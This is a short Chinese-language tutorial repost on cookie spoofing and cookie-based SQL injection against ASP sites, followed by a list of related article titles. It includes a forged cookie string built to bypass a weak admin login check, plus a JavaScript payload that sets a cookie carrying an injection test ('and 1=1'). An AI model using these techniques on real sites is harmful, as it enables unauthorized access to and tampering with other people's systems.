Cookie欺骗
来源:互联网 发布:客服软件忠仕 编辑:程序博客网 时间:2024/05/22 12:02
你的用户名@产生的COOKIE的网页文件所在的WEB目录[COOKIE改变的次数].txt 如:
ibm@baidu[1].txt
设置cookie脚本
Set-Cookie: name = VALUE; expires = DATE; path = PATH; domain = DOMAIN_NAME;
<% if request.cookies("lunjilyb")("username")="" then response.redirect "login.asp" end if
if request.cookies("lunjilyb")("password")="" then response.redirect "login.asp" end if
if request.cookies("lunjilyb")("randomid")<>12 then response.redirect "login.asp" end if %>
构造如下语句:
ASPSESSIONIDSQSRTSDC=DMJDAGLBOJNGBIGJPJAHIPOA; lunjilyb=randomid=12&password=jkh&username=jkh
是否可以绕过管理员验证
桂林老兵cookies的欺骗工具
request获取变量的方式:request.form获取的是post数据,request.querystring获取的get数据,request.cookies获取的是cookie中的数据。
<%id=request("id")%>呢?这个时候程序是按以下顺序来搜索集合:querystring,form,cookie,servervariable。
利用javascript,可以在本地浏览器中设置cookie格式:name=value的属性是指定cookie数据项的名称,value是该名称对应的值,它是一个字符串。
要求:name和value中不能包含分号,逗号及空白。
cookies的注入语句:alert(document.cookie=“id=”+escape(“这就是asp? id=xx后面xx代表的数值) and (这里是注入攻击代码)”)); 如:alert(document.cookie=“id=”+escape(“50 “and 1=1”)
意思是设置调用当前创建的cookie数据项值,在设置cookie时,它们首先保存在浏览器的内存中,退出浏览器时,才能被写入到硬盘中.
语句解释:
(50“and 1=1”)有分号,逗号及空白,所以我们要用到escape()函数对他们进行编码。
- cookie欺骗
- cookie 欺骗
- cookie欺骗
- COOKIE欺骗
- COOKIE欺骗
- COOKIE欺骗
- Cookie欺骗
- Cookie欺骗
- cookie 欺骗 与 cookie 注入
- 什么是cookie欺骗
- cookie欺骗教程
- Cookie欺骗原理
- COOKIE欺骗(上)
- COOKIE欺骗(下)
- cookie欺骗初探
- cookie欺骗初探
- Cookie欺骗的原理
- idf cookie欺骗
- C++程序设计-第3周 第一次见到了对象
- 线性表之单链表 图解和代码实现
- node.js入门指导
- 追加简述SurfaceView 与 GLSurfaceView效率
- hdoj 1671Phone List 字典树
- Cookie欺骗
- static关键字
- mongodb删除集合后磁盘空间不释放
- 技术做减法
- c语言基础例题之字符数组
- Web安全基础总结
- 2013微软精英大挑战之编程之美大赛
- win7主机和linux虚拟机利用WinScp传输文件
- Java--Java内存溢出实例